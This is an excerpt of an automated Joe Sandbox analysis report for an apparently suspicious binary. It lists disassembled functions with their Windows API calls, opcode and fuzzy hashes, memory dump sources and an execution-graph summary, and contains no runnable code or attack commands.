                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                    • API String ID: 1091760877-2248577382
                                                                                                                    • Opcode ID: e9306b72f9101311f2ad174c43e221fc29c7e098e6b23b3b78efc8bd04e1ffca
                                                                                                                    • Instruction ID: 0f148e6c7db27ddac9ea476abdc47cbd818652f711ec926bf27766e5e470c3fb
                                                                                                                    • Opcode Fuzzy Hash: e9306b72f9101311f2ad174c43e221fc29c7e098e6b23b3b78efc8bd04e1ffca
                                                                                                                    • Instruction Fuzzy Hash: 55D02EB25482203ACA103338BC0AC6F7C048B22371F20A704F038702F2CB2909898292
                                                                                                                    Function 00E3E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00E3DA55,?), ref: 00E3E2A3
                                                                                                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00E3DA55,?), ref: 00E3E2B1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FindHandleModuleResource
                                                                                                                    • String ID: RTL
                                                                                                                    • API String ID: 3537982541-834975271
                                                                                                                    • Opcode ID: 945aec084093f938eee458596a241135885f125c120ac883fd51311455547335
                                                                                                                    • Instruction ID: 64e97dbe78bd5eb4a01b1be230f94d49838a145965bfa11408b43660356ea210
                                                                                                                    • Opcode Fuzzy Hash: 945aec084093f938eee458596a241135885f125c120ac883fd51311455547335
                                                                                                                    • Instruction Fuzzy Hash: FBC012312407106AEA7017B57C0DB436E5C5B00BA5F051448F141F96D1D6F5C548C6A0
                                                                                                                    Function 00E4E470 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E467
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: p$z
                                                                                                                    • API String ID: 1269201914-1258701225
                                                                                                                    • Opcode ID: cfd6c34d3d97bdcf9f958a95396a2474154855065afb98f314211cc1cbabf94b
                                                                                                                    • Instruction ID: 1b9fbb44aacdeb782cf290b07b36f25c741f2f9b4392ab3cd539a5365c7d8cd5
                                                                                                                    • Opcode Fuzzy Hash: cfd6c34d3d97bdcf9f958a95396a2474154855065afb98f314211cc1cbabf94b
                                                                                                                    • Instruction Fuzzy Hash: 20B012C5299140BC3508A1247C03C3B024CD0C4F90330B02EFD15F0281D8408C000632
                                                                                                                    Function 00E4E455 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E467
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: U$z
                                                                                                                    • API String ID: 1269201914-4031037884
                                                                                                                    • Opcode ID: cda7a24327c1bf32133267182cfe476a14182edea4556c19aac2f24211fd7c67
                                                                                                                    • Instruction ID: efe193d134951006e374f7d08cd2112cfd8675cda7fbdbf7978f205bccaece39
                                                                                                                    • Opcode Fuzzy Hash: cda7a24327c1bf32133267182cfe476a14182edea4556c19aac2f24211fd7c67
                                                                                                                    • Instruction Fuzzy Hash: E4B012D12981007C350821207D07C3B030CD0C0F50330F02EF711F0281E8444E010532

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:2.6%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:12
                                                                                                                    Total number of Limit Nodes:0
                                                                                                                    execution_graph 14184 7ffd9b93e7fd 14185 7ffd9b93e80b SuspendThread 14184->14185 14187 7ffd9b93e8e4 14185->14187 14188 7ffd9b940008 14189 7ffd9b94000a ResumeThread 14188->14189 14191 7ffd9b940114 14189->14191 14192 7ffd9b941e85 14193 7ffd9b941ed2 GetFileAttributesW 14192->14193 14195 7ffd9b941f65 14193->14195 14196 7ffd9b940169 14197 7ffd9b940177 CloseHandle 14196->14197 14199 7ffd9b940254 14197->14199

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD9B780DA7 Relevance: .3, Instructions: 293COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 876373be268df853593692b5fdafab42d0378986fcc82d95864c9021db9c69ff
                                                                                                                    • Instruction ID: 275d21d6c773d9857dd1bd53e64f650d7eedb0a9a04eea6ce5040b55df992a42
                                                                                                                    • Opcode Fuzzy Hash: 876373be268df853593692b5fdafab42d0378986fcc82d95864c9021db9c69ff
                                                                                                                    • Instruction Fuzzy Hash: 38A1A2B5A19E4D8FEB98DF68C8657A97FE1FF55311F0002BAD04AD32E6CE7818018750
                                                                                                                    Function 00007FFD9B93CD6D Relevance: .1, Instructions: 99COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 265 7ffd9b93cd6d-7ffd9b93ce08 268 7ffd9b93ce0d-7ffd9b93ce45 call 7ffd9b93ce46 265->268
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1810776950.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b930000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 49a658226095411a4e2cfc852aab4f26568ea5e2a3658fcefd2ce135802abae9
                                                                                                                    • Instruction ID: d3e5f97090f1693832cb546a2277a442efb97dd16b7dac051528f863ec8a3c04
                                                                                                                    • Opcode Fuzzy Hash: 49a658226095411a4e2cfc852aab4f26568ea5e2a3658fcefd2ce135802abae9
                                                                                                                    • Instruction Fuzzy Hash: C831F470E18A1D8FCF94DF98D491AEDBBF1FB69300F2011AAD019E3291CA35A941CB44
                                                                                                                    Function 00007FFD9B940008 Relevance: 1.7, APIs: 1, Instructions: 163threadCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1810776950.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b930000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ResumeThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 947044025-0
                                                                                                                    • Opcode ID: d8b4cd556bafcd8b8014a2c9cf24a2230fa7ed3f1c4fa6136ed31d2ed71c2be3
                                                                                                                    • Instruction ID: e48b75a810cad9d39b3c763df9f4bef7b2fcddf86e84aaf9a64b9c552ae663c9
                                                                                                                    • Opcode Fuzzy Hash: d8b4cd556bafcd8b8014a2c9cf24a2230fa7ed3f1c4fa6136ed31d2ed71c2be3
                                                                                                                    • Instruction Fuzzy Hash: 22517D3090D79C8FDB56DFA8C865AE9BFF0EF16310F1441ABD049DB2A2DA359846CB11
                                                                                                                    Function 00007FFD9B93E7FD Relevance: 1.6, APIs: 1, Instructions: 139threadinjectionCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 12 7ffd9b93e7fd-7ffd9b93e809 13 7ffd9b93e814-7ffd9b93e8e2 SuspendThread 12->13 14 7ffd9b93e80b-7ffd9b93e813 12->14 17 7ffd9b93e8e4 13->17 18 7ffd9b93e8ea-7ffd9b93e934 13->18 14->13 17->18
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1810776950.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b930000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SuspendThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3178671153-0
                                                                                                                    • Opcode ID: 8c1a30217de86386a4361e82f0555a4ba0297ae54a71565354353175ccc52c06
                                                                                                                    • Instruction ID: 744c7afa4209507a184df4cb0544d0ba4d2585f49e86659d2fac44981b7f6b6e
                                                                                                                    • Opcode Fuzzy Hash: 8c1a30217de86386a4361e82f0555a4ba0297ae54a71565354353175ccc52c06
                                                                                                                    • Instruction Fuzzy Hash: BC413C70E0864C8FDB98DFA8C895AEDBBF0FF5A310F10416AD04DE7292DA74A845CB41
                                                                                                                    Function 00007FFD9B941E85 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 21 7ffd9b941e85-7ffd9b941f63 GetFileAttributesW 24 7ffd9b941f65 21->24 25 7ffd9b941f6b-7ffd9b941fa9 21->25 24->25
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1810776950.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b930000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3188754299-0
                                                                                                                    • Opcode ID: 32c181e51e8fcd5e2cccec107de39075f495399c96fb0fd725e5e10e84283732
                                                                                                                    • Instruction ID: 0bb66de4614c0c6de665e0e0497a669237762d4a137e78935dac070dec4c094b
                                                                                                                    • Opcode Fuzzy Hash: 32c181e51e8fcd5e2cccec107de39075f495399c96fb0fd725e5e10e84283732
                                                                                                                    • Instruction Fuzzy Hash: D941F870E08A1C8FDB98DF98D895BEDBBF1EB59310F10416ED049E7252DA71A846CB44
                                                                                                                    Function 00007FFD9B940169 Relevance: 1.4, APIs: 1, Instructions: 144COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 27 7ffd9b940169-7ffd9b940175 28 7ffd9b940180-7ffd9b940252 CloseHandle 27->28 29 7ffd9b940177-7ffd9b94017f 27->29 32 7ffd9b940254 28->32 33 7ffd9b94025a-7ffd9b9402ae 28->33 29->28 32->33
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1810776950.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b930000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2962429428-0
                                                                                                                    • Opcode ID: d076c66944567024b2d2846ac2a5465b37adf4e04182d0cf7e0a243c6fa99b35
                                                                                                                    • Instruction ID: 58b8bef947dcb42319759f4f69d6e2050b5f14eefce13ebf0a88e385d3b821be
                                                                                                                    • Opcode Fuzzy Hash: d076c66944567024b2d2846ac2a5465b37adf4e04182d0cf7e0a243c6fa99b35
                                                                                                                    • Instruction Fuzzy Hash: 9C416D70D0865C8FDB59DFA8C895BEDBBF0EF5A310F1041AAD049E7292DA74A985CB01
                                                                                                                    Function 00007FFD9B783FC1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: o
                                                                                                                    • API String ID: 0-252678980
                                                                                                                    • Opcode ID: 90cee2a992bd17d2e0e5db91dcac079dbb4acfd98325e5ca14da9a4c776ca307
                                                                                                                    • Instruction ID: a7f0e95323526d31ad360258a051c06b28c9c470e6ff790270b7c6ac8c8c0c54
                                                                                                                    • Opcode Fuzzy Hash: 90cee2a992bd17d2e0e5db91dcac079dbb4acfd98325e5ca14da9a4c776ca307
                                                                                                                    • Instruction Fuzzy Hash: AC113070E0655E8FDB78DB04C8946EC73B2EB54315F0042FAD51DA62A5CA741E858F44
                                                                                                                    Function 00007FFD9B7808D0 Relevance: .2, Instructions: 181COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 18368e65d9ce2385699acaa4cd725fbf74d0dd87a124965ab946ba64c67bbdd3
                                                                                                                    • Instruction ID: bc8d760767dc939a4e9f8c0a2230078ec2a92dd2e51aef7f29c4d7d3dd3925fb
                                                                                                                    • Opcode Fuzzy Hash: 18368e65d9ce2385699acaa4cd725fbf74d0dd87a124965ab946ba64c67bbdd3
                                                                                                                    • Instruction Fuzzy Hash: 96519236E0865D8FDB54EFA8D4A5AFD7BA1EF58315F0401BAE409D7196CF34A841CB80
                                                                                                                    Function 00007FFD9B780960 Relevance: .1, Instructions: 138COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 746e2053d1799b694b4f9a2e986850d251dc10baf071ed0befbcb8e6d2f1d09d
                                                                                                                    • Instruction ID: 2aaf177a4b5795f2dd269031a389ee256d2256183874c23f487a5a16e632f9a8
                                                                                                                    • Opcode Fuzzy Hash: 746e2053d1799b694b4f9a2e986850d251dc10baf071ed0befbcb8e6d2f1d09d
                                                                                                                    • Instruction Fuzzy Hash: 55412F31E18A1D9FDB58EF98D4A5AED77A1FF58315F10017AE41DD3296CE34A8418B80
                                                                                                                    Function 00007FFD9B780908 Relevance: .1, Instructions: 133COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 164 7ffd9b780908-7ffd9b798934 166 7ffd9b798936 164->166 167 7ffd9b79893b-7ffd9b798941 164->167 166->167 168 7ffd9b798a15-7ffd9b798a1b 167->168 169 7ffd9b798946-7ffd9b79897c 168->169 170 7ffd9b798a21-7ffd9b798a2a 168->170 172 7ffd9b798982-7ffd9b7989ef 169->172 177 7ffd9b798a0d-7ffd9b798a12 172->177 178 7ffd9b7989f1-7ffd9b7989fa 172->178 177->168 178->177 179 7ffd9b7989fc-7ffd9b798a0c 178->179
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 48c2f8af60c22ce31e49249731661e5c6b91890fe3a3cb2f1ae313f8fd0dc834
                                                                                                                    • Instruction ID: 7f57a3efb7376bf9e2f2151377593fe5a150b3e3c3320bccbe9eaa76b643324b
                                                                                                                    • Opcode Fuzzy Hash: 48c2f8af60c22ce31e49249731661e5c6b91890fe3a3cb2f1ae313f8fd0dc834
                                                                                                                    • Instruction Fuzzy Hash: FB518D30A08A0E9FCF84EF98D494EED7BF1FF58355B150269E419E7260DA34E990CB90
                                                                                                                    Function 00007FFD9B780998 Relevance: .1, Instructions: 113COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3f28440f31e260881bf4961ad55a51fdf236c3aacce4a81056d1dd40ea63ce2e
                                                                                                                    • Instruction ID: b84c0ed93872ce5bc327513c00b20d2422e2655610e8c1487a5e4a22be75715a
                                                                                                                    • Opcode Fuzzy Hash: 3f28440f31e260881bf4961ad55a51fdf236c3aacce4a81056d1dd40ea63ce2e
                                                                                                                    • Instruction Fuzzy Hash: C1410B70E14A5D8FDF94EF98C8A5AEDBBF1FF58301F000179D409E32A5DA34A8518B81
                                                                                                                    Function 00007FFD9B78705A Relevance: .1, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8115b1173c6ab62e8d1ff29a05cc94d8579ddd2af400d3ec629ef44863109b7d
                                                                                                                    • Instruction ID: 568d492dd80c7d294d07f610014a6bdcb5011b54c29289399d3d9fc71dd83fe3
                                                                                                                    • Opcode Fuzzy Hash: 8115b1173c6ab62e8d1ff29a05cc94d8579ddd2af400d3ec629ef44863109b7d
                                                                                                                    • Instruction Fuzzy Hash: 8041A870E1AA1D9EEBA4EB58C8A8AE877F1FF58342F5101F5D00DD21B1DA346A818F11
                                                                                                                    Function 00007FFD9B784FB8 Relevance: .1, Instructions: 89COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 30eb2d1c12ad64e2d65cebd8979de9b5d1494723305821639a2fe2de2262220a
                                                                                                                    • Instruction ID: 09246ecee0a7598147bfbca8ffc96fa2014257d3eeb0bd742b78d09a12c78753
                                                                                                                    • Opcode Fuzzy Hash: 30eb2d1c12ad64e2d65cebd8979de9b5d1494723305821639a2fe2de2262220a
                                                                                                                    • Instruction Fuzzy Hash: D2318B75A04A1C8FDFA4DF18C895AE9B7F1FBA5305F1001EAD00EE3664CA759A85CF42
                                                                                                                    Function 00007FFD9B780C25 Relevance: .1, Instructions: 78COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3fe328cd397377b5fb7f3747c0b2df0f243e6d12bf30f8310357fd1156ff0cea
                                                                                                                    • Instruction ID: 37c09cd9a84d90e8750213c2b34d3f3968a54414793440b509fb98b9fc5ac148
                                                                                                                    • Opcode Fuzzy Hash: 3fe328cd397377b5fb7f3747c0b2df0f243e6d12bf30f8310357fd1156ff0cea
                                                                                                                    • Instruction Fuzzy Hash: 3D21FB36B0EB8D4FE7229AA8DC611ED7B60EB52312F0646B3C055871F2DA3816098B91
                                                                                                                    Function 00007FFD9B780C38 Relevance: .1, Instructions: 59COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e2204bdf68d1f7384ae44dacd6503cc98062c89588c33a641936370f4cddfa1d
                                                                                                                    • Instruction ID: 4f7ee495eb8cccf5d908da68d99fdb874235554a8abb585acc104ab75adb5f02
                                                                                                                    • Opcode Fuzzy Hash: e2204bdf68d1f7384ae44dacd6503cc98062c89588c33a641936370f4cddfa1d
                                                                                                                    • Instruction Fuzzy Hash: FF110836B0EB8D4EE7229A64C8602F97B70EB52312F0646B3C051DB1F2DA3816098B91
                                                                                                                    Function 00007FFD9B780B7F Relevance: .1, Instructions: 57COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8bb6890d351fb4fd3fab5fbc18bbbccb6257e9154700f61ee6b45bb46f90c04d
                                                                                                                    • Instruction ID: 828950c5210494d0a64d676bb40e8d117aa741ba454c0ba4b9645fae842be331
                                                                                                                    • Opcode Fuzzy Hash: 8bb6890d351fb4fd3fab5fbc18bbbccb6257e9154700f61ee6b45bb46f90c04d
                                                                                                                    • Instruction Fuzzy Hash: FE115A3162964DCFCF44EF68C8919EA7BA0FF58308F0502AAE84CD7261D730A565CB81
                                                                                                                    Function 00007FFD9B780C40 Relevance: .1, Instructions: 53COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 71df5d0c68ff264453091a1595940b7fe1c19db0acde8cda0e25faa45938d5f2
                                                                                                                    • Instruction ID: 8adad751ecd81bc83cbd65cba9db5a560f061c48e548013c32d5d80cde737d16
                                                                                                                    • Opcode Fuzzy Hash: 71df5d0c68ff264453091a1595940b7fe1c19db0acde8cda0e25faa45938d5f2
                                                                                                                    • Instruction Fuzzy Hash: 8A11A336A0EB8D4EE7229A64C8642E97B70EB52311F0646B7C051DB1F2DA3826198B91
                                                                                                                    Function 00007FFD9B780C50 Relevance: .0, Instructions: 42COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
